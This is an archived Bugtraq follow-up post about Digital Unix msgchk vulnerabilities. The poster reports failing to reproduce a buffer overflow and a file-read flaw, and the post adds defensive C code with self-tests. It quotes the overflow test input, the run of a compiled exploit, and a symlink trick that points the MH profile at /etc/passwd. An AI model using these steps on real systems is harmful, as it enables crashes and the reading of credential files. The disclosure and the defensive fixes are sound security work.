Bugtraq mailing list archives

FW: Digital Unix 4.0x msgchk multiple vulnerabilities


From: "Boyce, Nick" <nick.boyce () eds com>
Date: Wed, 12 Sep 2001 10:54:41 +0100

[Resend:  my original reply to Bugtraq on Monday 10th has not appeared, and
I haven't seen any other followup;  this time I've replaced all weird >
ASCII 127 characters in my screen dumps by X's in case that prevented my
email's handling by some MTA somewhere]

On 10 September 2001 03:54, SeungHyun Seo said :

there were multiple vulnerabilities in "/usr/bin/mh/msgchk" on Digital
Unix 4.0x. It's a mail utility - check for messages (only available within
the message handling system, MH)
[...]
/usr/bin/mh/msgchk is affected by a buffer overflow vulnerability

 -- snip --
  $ /usr/bin/mh/msgchk `perl -e 'print "A"x9000'`
  AAAAAAAAAAAAA ... ...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA : 
   msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAA ... ...
AAAAAAAAAAAAAAAAAAAAAAA
  Memory fault(coredump)
 -- snip --

NOT confirmed.  On my system (Digital Unix 4.0D, Patch Kit 5) this gives me :

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
AAAAAAAAAAAAAA :
   msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
followed by another command prompt.


And the exploit doesn't work :

/usr/users/joesoap/bin>cc msgbreak.c -o msgbreak -std
/usr/users/joesoap/bin>msgbreak
I'm going to create the standard MH path for you.
AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 .... [lots of pairs of "G" followed by "y" with an upsilon accent]
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 .... [even more A's]
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA XX :
   msgchk: no such user as AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
/usr/users/joesoap/bin>whoami
joesoap
/usr/users/joesoap/bin>uname -a
OSF1 mybox V4.0 878 alpha

(Lines wrapped for readability, and unprintable blobs replaced by X's.)

Looks like there must have been a patch for this somewhere in Patch Kits 1
thru 5.  
Or maybe the hole only exists *prior* to 4.0D.



Part 2:

 Next, /usr/bin/mh/msgchk has a vulnerability that lets anyone read 1 line
 of the unprivileged file on the system. It's an old bug on Red Hat Linux
 2.0, but it also works on Digital Unix 4.0x

This hole doesn't work either :

/usr/users/joesoap>ln -sf /etc/passwd ./~mh_profile
/usr/users/joesoap>/usr/bin/mh/msgchk
joesoap :
   No file-source mail waiting; last read on Wed, 27 Sep 2000 17:48:21 BST

/usr/users/joesoap>head -2 ./~mh_profile
root:xxxxxxxxxxxxx:0:1:system PRIVILEGED account:/:/bin/csh
nobody:*Nologin:65534:65534:anonymous NFS user:/:


Nick Boyce
EDS, Bristol, UK
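The two tests in the mail above exercise two generic defects in a set-id mail checker: an unbounded copy of a user-supplied login name into a fixed buffer, and a profile read that follows a symlink the user planted. The C below is an added illustration of how both checks look when done safely; it is not msgchk's source and not code from either poster. The login-name limit `MAX_USER`, the temp-directory template and the sample profile line are assumptions made for the example.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed upper bound on a login name for this example; a real program
 * would take sysconf(_SC_LOGIN_NAME_MAX). */
#define MAX_USER 32

/* Build the "no such user as <name>" diagnostic into a caller-supplied
 * buffer.  Returns 0 on success, -1 if the name is longer than any valid
 * login name or would not fit (nothing is copied in that case).  The crash
 * in the original report came from a 9000-byte name reaching a path like
 * this one; a length check plus a bounded copy cannot overrun. */
int format_no_such_user(char *out, size_t outlen, const char *name)
{
    size_t n = strnlen(name, MAX_USER + 1);
    if (n > MAX_USER)
        return -1;
    int r = snprintf(out, outlen, "msgchk: no such user as %s", name);
    if (r < 0 || (size_t)r >= outlen)
        return -1;
    return 0;
}

/* Open a user-named profile without following a symlink, and refuse
 * anything that is not a regular file owned by the real user.  A set-id
 * program that reads such a file and echoes part of it in a diagnostic
 * must do this, or "ln -sf /etc/passwd ~mh_profile" turns the diagnostic
 * into a one-line file read.  Returns the fd, or -1 with errno set
 * (ELOOP for a symlink, EPERM for a wrong type or owner). */
int open_profile_nofollow(const char *path)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_uid != getuid()) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Self-check for the name bound: a normal login name is accepted and a
 * 9000-byte one (the report's test input) is rejected.  Returns 1 if both
 * outcomes are as intended. */
int demo_name_lengths(void)
{
    char msg[128];
    char *huge = malloc(9001);
    if (!huge)
        return 0;
    memset(huge, 'A', 9000);
    huge[9000] = '\0';
    int ok = format_no_such_user(msg, sizeof msg, "joesoap") == 0
          && strcmp(msg, "msgchk: no such user as joesoap") == 0
          && format_no_such_user(msg, sizeof msg, huge) == -1;
    free(huge);
    return ok;
}

/* Self-check for the symlink refusal: create a regular file and a symlink
 * to it in a fresh temp directory (constructed test data), then confirm
 * the symlink is refused with ELOOP and the real file is accepted. */
int demo_symlink_check(void)
{
    char dir[] = "/tmp/mhprofXXXXXX";
    if (!mkdtemp(dir))
        return 0;
    char real[256], link[256];
    snprintf(real, sizeof real, "%s/real_profile", dir);
    snprintf(link, sizeof link, "%s/profile_link", dir);
    int ok = 0;
    FILE *f = fopen(real, "w");
    if (f) {
        fputs("Path: Mail\n", f);          /* assumed sample profile line */
        fclose(f);
        if (symlink(real, link) == 0) {
            int fd_link = open_profile_nofollow(link);
            int e = errno;
            int fd_real = open_profile_nofollow(real);
            ok = (fd_link < 0 && e == ELOOP && fd_real >= 0);
            if (fd_real >= 0)
                close(fd_real);
            unlink(link);
        }
        unlink(real);
    }
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("name bound ok: %d\n", demo_name_lengths());
    printf("symlink refusal ok: %d\n", demo_symlink_check());
    return 0;
}
```

Both checks are cheap and independent of the mail format: the length check rejects the input before any copy happens, and O_NOFOLLOW plus the fstat ownership test close the symlink trick even when the program still runs with elevated privileges at that point.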

